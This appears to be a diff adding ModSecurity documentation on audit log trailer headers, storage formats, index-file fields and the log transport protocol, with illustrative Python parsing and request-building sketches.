+                    <para>Zero or more <literal>Message</literal> headers can be present in any
+                        trailer, and each such header will represent a single ModSecurity warning or
+                        error, displayed in the order they were raised.</para>
+                    <para>The example below was broken into multiple lines to make it fit this
+                        page:</para>
+                    <programlisting>Message: Access denied with code 400 (phase 2). Pattern match "^\w+:/" at
+  REQUEST_URI_RAW. [file "/etc/apache2/rules-1.6.1/modsecurity_crs_20_
+  protocol_violations.conf"] [line "74"] [id "960014"] [msg "Proxy access
+  attempt"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/PROXY_ACCESS"]</programlisting>
+                </section>
+                <section>
+                    <title>Producer</title>
+                    <para>The <literal>Producer</literal> header identifies the product that
+                        generated the audit log. For example:</para>
+                    <programlisting>Producer: ModSecurity for Apache/2.5.5 (http://www.modsecurity.org/).</programlisting>
+                    <para>ModSecurity allows rule sets to add their own signatures to the <literal
+                            >Producer</literal> information (this is done using the <literal
+                            >SecComponentSignature</literal> directive). Below is an example of the
+                            <literal>Producer</literal> header with the signature of one component
+                        (all one line):</para>
+                    <programlisting>Producer: ModSecurity for Apache/2.5.5 (http://www.modsecurity.org/);
+    MyComponent/1.0.0 (Beta).</programlisting>
+                </section>
+                <section>
+                    <title>Response-Body-Transformed</title>
+                    <para>This header will appear in every audit log that contains a response
+                        body:</para>
+                    <programlisting>Response-Body-Transformed: Dechunked</programlisting>
+                    <para>The content of the header is constant at present, so the header is only
+                        useful as a reminder that the recorded response body is not identical to the
+                        one sent to the client. The actual content is the same, except that Apache
+                        may further compress the body and deliver it in chunks.</para>
+                </section>
+                <section>
+                    <title>Sanitised-Args</title>
+                    <para>The <literal>Sanitised-Args</literal> header contains a list of arguments
+                        that were sanitised (each byte of their content replaced with an asterisk)
+                        before logging. For example:</para>
+                    <programlisting>Sanitised-Args: "old_password", "new_password", "new_password_repeat".</programlisting>
+                </section>
+                <section>
+                    <title>Sanitised-Request-Headers</title>
+                    <para>The <literal>Sanitised-Request-Headers</literal> header contains a list of
+                        request headers that were sanitised before logging. For example:</para>
+                    <programlisting>Sanitised-Request-Headers: "Authentication".</programlisting>
+                </section>
+                <section>
+                    <title>Sanitised-Response-Headers</title>
+                    <para>The <literal>Sanitised-Response-Headers</literal> header contains a list
+                        of response headers that were sanitised before logging. For example:</para>
+                    <programlisting>Sanitised-Response-Headers: "My-Custom-Header".</programlisting>
+                </section>
+                <section>
+                    <title>Server</title>
+                    <para>The <literal>Server</literal> header identifies the web server. For
+                        example:</para>
+                    <programlisting>Server: Apache/2.0.54 (Debian GNU/Linux) mod_ssl/2.0.54 OpenSSL/0.9.7e</programlisting>
+                    <para>This information may sometimes be present in any of the parts that contain
+                        response headers, but there are a few cases when it isn't:<orderedlist>
+                            <listitem>
+                                <para>None of the response headers were recorded.</para>
+                            </listitem>
+                            <listitem>
+                                <para>The information in the response headers is not accurate
+                                    because server signature masking was used.</para>
+                            </listitem>
+                        </orderedlist></para>
+                </section>
+                <section>
+                    <title>Stopwatch</title>
+                    <para>The <literal>Stopwatch</literal> header provides certain diagnostic
+                        information that allows you to determine the performance of the web server
+                        and of ModSecurity itself. It will typically look like this:</para>
+                    <programlisting>Stopwatch: 1222945098201902 2118976 (770* 4400 -)</programlisting>
+                    <para>Each line can contain up to 5 different values. Some values can be absent;
+                        each absent value will be replaced with a dash.</para>
+                    <para>The meanings of the values are as follows (all values are in
+                            microseconds):<orderedlist>
+                            <listitem>
+                                <para>Transaction timestamp in microseconds since January 1st,
+                                    1970.</para>
+                            </listitem>
+                            <listitem>
+                                <para>Transaction duration.</para>
+                            </listitem>
+                            <listitem>
+                                <para>The time from the moment Apache started processing the
+                                    request until phase 2 of ModSecurity began. If an asterisk
+                                    is present, the time includes the time it took
+                                    ModSecurity to read the request body from the client (typically
+                                    slow). This value can be used to provide a rough estimate of the
+                                    client speed, but only with larger request bodies (the smaller
+                                    request bodies may arrive in a single TCP/IP packet).</para>
+                            </listitem>
+                            <listitem>
+                                <para>The time from the start of processing until phase 2 was
+                                    completed. If you subtract the previous value from this value
+                                    you will get the exact duration of phase 2 (which is the main
+                                    rule processing phase).</para>
+                            </listitem>
+                            <listitem>
+                                <para>The time from the start of request processing until we
+                                    began sending a fully-buffered response body to the client. If
+                                    you subtract this value from the total transaction duration and
+                                    divide the response body size by the result, you may get a rough
+                                    estimate of the client speed, but only for larger response bodies.</para>
+                            </listitem>
+                        </orderedlist></para>
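+                    <para>The following Python sketch shows how the values described above might
+                        be extracted from a <literal>Stopwatch</literal> header. It is not part of
+                        ModSecurity; the names <literal>Stopwatch</literal> and <literal
+                            >parse_stopwatch</literal> are hypothetical, and the code assumes that
+                        the first two values are always present and that only the three values
+                        inside the parentheses can be replaced with a dash:</para>

```python
import re
from typing import NamedTuple, Optional


class Stopwatch(NamedTuple):
    started_us: int                      # microseconds since January 1st, 1970
    duration_us: int                     # total transaction duration
    phase2_started_us: Optional[int]     # offset at which phase 2 began
    body_read_included: bool             # True when the asterisk is present
    phase2_finished_us: Optional[int]    # offset at which phase 2 completed
    response_started_us: Optional[int]   # offset at which sending the body began


_STOPWATCH = re.compile(r"^Stopwatch: (\d+) (\d+) \((\S+) (\S+) (\S+)\)$")


def _optional(value: str) -> Optional[int]:
    # An absent value is recorded as a dash.
    return None if value == "-" else int(value)


def parse_stopwatch(line: str) -> Stopwatch:
    match = _STOPWATCH.match(line.strip())
    if match is None:
        raise ValueError("not a Stopwatch header: " + repr(line))
    started, duration, third, fourth, fifth = match.groups()
    starred = third.endswith("*")
    return Stopwatch(
        int(started),
        int(duration),
        _optional(third.rstrip("*")),
        starred,
        _optional(fourth),
        _optional(fifth),
    )


sw = parse_stopwatch("Stopwatch: 1222945098201902 2118976 (770* 4400 -)")
# Duration of phase 2: fourth value minus third value.
print(sw.phase2_finished_us - sw.phase2_started_us)  # 3630
```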
+                </section>
+                <section>
+                    <title>WebApp-Info</title>
+                    <para>The <literal>WebApp-Info</literal> header contains information on the
+                        application to which the recorded transaction belongs. This information will
+                        appear only if it is known, which will happen if <literal
+                            >SecWebAppId</literal> was set, or <literal>setsid</literal> or <literal
+                            >setuid</literal> executed in the transaction.</para>
+                    <para>The header uses the following format:</para>
+                    <programlisting>WebApp-Info: "WEBAPPID" "SESSIONID" "USERID"</programlisting>
+                    <para>Each unknown value is replaced with a dash.</para>
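+                    <para>A consumer of this header could split it as sketched below in Python.
+                        This is an illustration rather than ModSecurity code: <literal
+                            >parse_webapp_info</literal> is a hypothetical name, the sample values
+                        are invented, and the code assumes that each value is either enclosed in
+                        double quotes or is a bare dash:</para>

```python
import re
from typing import Optional, Tuple

# A value is assumed to be either a "quoted" string or a bare token.
_VALUE = re.compile(r'"([^"]*)"|(\S+)')


def parse_webapp_info(line: str) -> Tuple[Optional[str], ...]:
    """Return (webapp_id, session_id, user_id); unknown values become None."""
    name, _, rest = line.partition(":")
    if name.strip() != "WebApp-Info":
        raise ValueError("not a WebApp-Info header: " + repr(line))
    values = [quoted or bare for quoted, bare in _VALUE.findall(rest)]
    if len(values) != 3:
        raise ValueError("expected 3 values, found %d" % len(values))
    return tuple(None if value == "-" else value for value in values)


# Hypothetical example: application and user known, session unknown.
info = parse_webapp_info('WebApp-Info: "shop" "-" "alice"')
print(info)
```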
+                </section>
+            </section>
+            <section>
+                <title>Reduced Multipart Request Body (<literal>I</literal>)</title>
+                <para>Transactions that deal with file uploads tend to be large, yet the file
+                    contents are not always relevant from the security point of view. The <literal
+                        >I</literal> part was designed to avoid recording raw <literal
+                        >multipart/form-data</literal> request bodies, replacing them with a
+                    simulated <literal>application/x-www-form-urlencoded</literal> body that
+                    contains the same key-value parameters.</para>
+                <para>The reduced multipart request body will not contain any file information. The
+                        <literal>J</literal> part (currently not implemented) is intended to carry
+                    the file metadata.</para>
+            </section>
+            <section>
+                <title>Multipart Files Information (<literal>J</literal>)</title>
+                <para>The purpose of part <literal>J</literal> is to record the information on the
+                    files contained in a <literal>multipart/form-data</literal> request body. This
+                    is handy in the cases when the original request body was not recorded, or when
+                    only a reduced version was recorded (e.g. when part <literal>I</literal> was
+                    used instead of part <literal>C</literal>).</para>
+                <note>
+                    <para>This part is reserved for future use. It is not implemented in ModSecurity
+                        2.x.</para>
+                </note>
+            </section>
+            <section>
+                <title>Matched Rules (<literal>K</literal>)</title>
+                <para>The matched rules part contains a record of all ModSecurity rules that matched
+                    during transaction processing.</para>
+                <para>This part is available starting with ModSecurity 2.5.x.</para>
+            </section>
+            <section>
+                <title>Audit Log Footer (<literal>Z</literal>)</title>
+                <para>Part <literal>Z</literal> is a special part that only has a boundary but no
+                    content. Its only purpose is to signal the end of an audit log.</para>
+            </section>
+        </section>
+        <section>
+            <title>Storage Formats</title>
+            <para>ModSecurity supports two audit log storage formats:<orderedlist>
+                    <listitem>
+                        <para><emphasis>Serial</emphasis> audit log format - multiple audit log
+                            entries stored in the same file.</para>
+                    </listitem>
+                    <listitem>
+                        <para><emphasis>Concurrent</emphasis> audit log format - one file is used
+                            for every audit log.</para>
+                    </listitem>
+                </orderedlist></para>
+            <section>
+                <title>Serial Audit Log Format</title>
+                <para>The serial audit log format stores multiple audit log entries within the same
+                    file (one after another). This is often very convenient (audit log entries are
+                    easy to find) but this format is only suitable for light logging in the current
+                    ModSecurity implementation because writing to the file is serialised: only one
+                    audit log entry can be written at any one time.</para>
+            </section>
+            <section>
+                <title>Concurrent Audit Log Format</title>
+                <para>The concurrent audit log format uses one file per audit log entry, and allows
+                    many transactions to be recorded at once. A hierarchical directory structure is
+                    used to ensure that the number of files created in any one directory remains
+                    relatively small. For example:</para>
+                <programlisting>$LOGGING-HOME/20081128/20081128-1414/20081128-141417-
+  egDKy38AAAEAAAyMHXsAAAAA</programlisting>
+                <para>The current time is used to work out the directory structure. The file name is
+                    constructed using the current time and the transaction ID.</para>
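+                <para>The layout in the example above can be reproduced with a few lines of
+                    Python. This is only a sketch: <literal>concurrent_log_path</literal> is a
+                    hypothetical helper, the storage directory is invented, and whether
+                    ModSecurity uses local time or UTC is not stated here, so the caller supplies
+                    the timestamp:</para>

```python
import posixpath
from datetime import datetime


def concurrent_log_path(home: str, when: datetime, transaction_id: str) -> str:
    """Build home/YYYYMMDD/YYYYMMDD-HHMM/YYYYMMDD-HHMMSS-transaction_id."""
    day = when.strftime("%Y%m%d")
    minute = when.strftime("%Y%m%d-%H%M")
    name = when.strftime("%Y%m%d-%H%M%S") + "-" + transaction_id
    return posixpath.join(home, day, minute, name)


# The directory name is an assumption; the date, time and transaction ID
# are taken from the example above.
path = concurrent_log_path(
    "/var/log/modsec_audit",
    datetime(2008, 11, 28, 14, 14, 17),
    "egDKy38AAAEAAAyMHXsAAAAA",
)
print(path)
```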
+                <para>The creation of every audit log in concurrent format is recorded with an entry
+                    in the concurrent audit log <emphasis>index file</emphasis>. The format of each
+                    line resembles the common web server access log format. For example:</para>
+                <programlisting>192.168.0.111 192.168.0.1 - - [28/Nov/2008:15:06:32 +0000]
+  "GET /?p=\\ HTTP/1.1" 200 69 "-" "-" NOfRx38AAAEAAAzcCU4AAAAA
+  "-" /20081128/20081128-1506/20081128-150632-NOfRx38AAAEAAAzcCU4AAAAA
+  0 1183 md5:ffee2d414cd43c2f8ae151652910ed96</programlisting>
+                <para>The tokens on the line are as follows:</para>
+                <orderedlist>
+                    <listitem>
+                        <para>Hostname (or IP address, if the hostname is not known)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Source IP address</para>
+                    </listitem>
+                    <listitem>
+                        <para>Remote user (from HTTP Authentication)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Local user (from identd)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Timestamp</para>
+                    </listitem>
+                    <listitem>
+                        <para>Request line</para>
+                    </listitem>
+                    <listitem>
+                        <para>Response status</para>
+                    </listitem>
+                    <listitem>
+                        <para>Bytes sent (in the response body)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Referrer information</para>
+                    </listitem>
+                    <listitem>
+                        <para>User-Agent information</para>
+                    </listitem>
+                    <listitem>
+                        <para>Transaction ID</para>
+                    </listitem>
+                    <listitem>
+                        <para>Session ID</para>
+                    </listitem>
+                    <listitem>
+                        <para>Audit log file name (relative to the audit logging home, as configured
+                            using the <literal>SecAuditLogStorageDir</literal> directive)</para>
+                    </listitem>
+                    <listitem>
+                        <para>Audit log offset</para>
+                    </listitem>
+                    <listitem>
+                        <para>Audit log size</para>
+                    </listitem>
+                    <listitem>
+                        <para>Audit log hash (the hash begins with the name of the algorithm used,
+                            followed by a colon, followed by the hexadecimal representation of the
+                            hash itself); this hash can be used to verify that the transaction was
+                            correctly recorded and that it hasn't been modified since.</para>
+                    </listitem>
+                </orderedlist>
+                <note>
+                    <para>Lines in the index file will be up to 3980 bytes long, and the information
+                        logged will be reduced to fit where necessary. Reduction will occur within
+                        the individual fields, but the overall format will remain the same. The
+                        character <literal>L</literal> will appear as the last character on a
+                        reduced line. A space will be the last character on a line that was not
+                        reduced to stay within the limit.</para>
+                </note>
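+                <para>The Python sketch below shows one possible way to split an index line into
+                    the sixteen tokens listed above and to check an audit log entry against its
+                    hash. It is not taken from ModSecurity: the field names and both function
+                    names are hypothetical, quoted strings are assumed to use backslash escapes,
+                    reduced lines (those ending in <literal>L</literal>) are not handled, and the
+                    hash is assumed to cover exactly the bytes of the audit log entry:</para>

```python
import hashlib
import re

FIELDS = (
    "hostname", "source_ip", "remote_user", "local_user", "timestamp",
    "request_line", "status", "bytes_sent", "referrer", "user_agent",
    "transaction_id", "session_id", "file_name", "offset", "size", "hash",
)

# A token is a [bracketed] timestamp, a "quoted" string, or a run of
# non-space characters.
_TOKEN = re.compile(r'\[[^\]]*\]|"(?:[^"\\]|\\.)*"|\S+')


def parse_index_line(line: str) -> dict:
    tokens = _TOKEN.findall(line)
    if len(tokens) != len(FIELDS):
        raise ValueError("expected %d tokens, found %d" % (len(FIELDS), len(tokens)))
    return dict(zip(FIELDS, tokens))


def entry_matches_hash(entry: bytes, hash_token: str) -> bool:
    # The token looks like "md5:ffee2d41..."; the algorithm name comes first.
    algorithm, _, expected = hash_token.partition(":")
    actual = hashlib.new(algorithm, entry).hexdigest()
    return actual == expected.lower()


# The index line from the example above, joined back into a single line.
line = (
    r'192.168.0.111 192.168.0.1 - - [28/Nov/2008:15:06:32 +0000] '
    r'"GET /?p=\\ HTTP/1.1" 200 69 "-" "-" NOfRx38AAAEAAAzcCU4AAAAA '
    r'"-" /20081128/20081128-1506/20081128-150632-NOfRx38AAAEAAAzcCU4AAAAA '
    r'0 1183 md5:ffee2d414cd43c2f8ae151652910ed96'
)
record = parse_index_line(line)
print(record["transaction_id"], record["offset"], record["size"])
```

+                <para>All tokens are returned as strings, including any surrounding quotes or
+                    brackets, so that nothing from the original line is lost.</para>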
+            </section>
+        </section>
+        <section>
+            <title>Transport Protocol</title>
+            <para>Audit logs generated in multi-sensor deployments are of little use if left on the
+                sensors. More commonly, they will be transported to a central logging server using
+                the transport protocol described in this section:</para>
+            <orderedlist>
+                <listitem>
+                    <para>The transport protocol is based on the HTTP protocol.</para>
+                </listitem>
+                <listitem>
+                    <para>The server end is an SSL-enabled web server with HTTP Basic Authentication
+                        configured.</para>
+                </listitem>
+                <listitem>
+                    <para>Clients will open a connection to the centralisation web server and
+                        authenticate (given the end-point URI, the username and the
+                        password).</para>
+                </listitem>
+                <listitem>
+                    <para>Clients will submit every audit log in a single <literal>PUT</literal>
+                        transaction, placing the file in the body of the request and additional
+                        information in the request headers (see below for details).</para>
+                </listitem>
+                <listitem>
+                    <para>The server will process each submission and respond with an appropriate status
+                        code: </para>
+                    <orderedlist>
+                        <listitem>
+                            <para>200 (OK) - the submission was processed; the client can delete the
+                                corresponding audit log entry if it so desires. The same audit log
+                                entry must not be submitted again.</para>
+                        </listitem>
+                        <listitem>
+                            <para>409 (Conflict) - if the submission is in an invalid format and cannot
+                                be processed. The client should attempt to fix the problem with the
+                                submission and attempt delivery again at a later time. This error is
+                                generally going to occur due to a programming error in the protocol
+                                implementation, and not because of the content of the audit log
+                                entry that is being transported. </para>
+                        </listitem>
+                        <listitem>
+                            <para>500 (Internal Server Error) - if the server was unable to
+                                correctly process the submission, due to its own fault. The client
+                                should re-attempt delivery at a later time. A client that starts
+                                receiving 500 responses to all its submissions should suspend its
+                                operations for a period of time before continuing.</para>
+                        </listitem>
+                    </orderedlist>
+                </listitem>
+            </orderedlist>
+            <note>
+                <para>Server implementations are advised to accept all submissions that correctly
+                    implement the protocol. Clients are unlikely to be able to overcome problems
+                    within audit log entries, so such problems are best resolved on the server
+                    side.</para>
+            </note>
+            <note>
+                <para>When an error occurs, the server may place an explanation of the problem in
+                    the text part of the response line.</para>
+            </note>
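+            <para>A client might map the three status codes described above to its next action
+                along the following lines. The Python sketch is illustrative only: the
+                <literal>NextStep</literal> names are hypothetical, and the treatment of any other
+                status code is an assumption, since this document does not define one:</para>

```python
from enum import Enum


class NextStep(Enum):
    DELETE_ENTRY = "accepted; the entry may be deleted and must not be resent"
    FIX_AND_RETRY = "invalid submission; fix the request and retry later"
    RETRY_LATER = "server-side failure; retry later"
    UNSPECIFIED = "status code not covered by the protocol description"


def next_step(status: int) -> NextStep:
    steps = {
        200: NextStep.DELETE_ENTRY,
        409: NextStep.FIX_AND_RETRY,
        500: NextStep.RETRY_LATER,
    }
    # Assumption: anything else is reported to the caller rather than guessed at.
    return steps.get(status, NextStep.UNSPECIFIED)


print(next_step(200).name)
print(next_step(500).name)
```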
+            <section>
+                <title>Request Headers Information</title>
+                <para>Each audit log entry submission must contain additional information in the
+                    request headers:</para>
+                <orderedlist>
+                    <listitem>
+                        <para>Header <literal>X-Content-Hash</literal> must contain the audit log
+                            entry hash. Clients should expect the audit log entries to be validated
+                            against the hash by the server.</para>
+                    </listitem>
+                    <listitem>
+                        <para>Header <literal>X-ForensicLog-Summary</literal> must contain the
+                            entire concurrent format index line.</para>
+                    </listitem>
+                    <listitem>
+                        <para>The <literal>Content-Length</literal> header must be present and
+                            contain the length of the audit log entry.</para>
+                    </listitem>
+                </orderedlist>
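+                <para>The headers listed above could be assembled as in the following Python
+                    sketch, which builds a <literal>PUT</literal> request with the standard
+                    library but does not send it. The function name, the end-point URI, the
+                    credentials and the sample entry are all hypothetical, and the exact value
+                    format expected in <literal>X-Content-Hash</literal> is an assumption (the
+                    hash token from the index line is used here):</para>

```python
import base64
import urllib.request


def build_submission(url: str, entry: bytes, index_line: str,
                     entry_hash: str, username: str,
                     password: str) -> urllib.request.Request:
    """Prepare (but do not send) a PUT request that carries one audit log entry."""
    credentials = (username + ":" + password).encode("utf-8")
    headers = {
        # HTTP Basic Authentication, as required by the server end.
        "Authorization": "Basic " + base64.b64encode(credentials).decode("ascii"),
        "X-Content-Hash": entry_hash,
        "X-ForensicLog-Summary": index_line,
        "Content-Length": str(len(entry)),
    }
    return urllib.request.Request(url, data=entry, headers=headers, method="PUT")


# Every value below is a placeholder chosen for illustration.
entry = b"example audit log entry"
request = build_submission(
    "https://logs.example.com/audit-log-receiver",
    entry,
    "example index line",
    "md5:00000000000000000000000000000000",
    "sensor-1",
    "secret",
)
print(request.get_method(), request.full_url)
```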
+            </section>
+        </section>
+    </section>
+</article>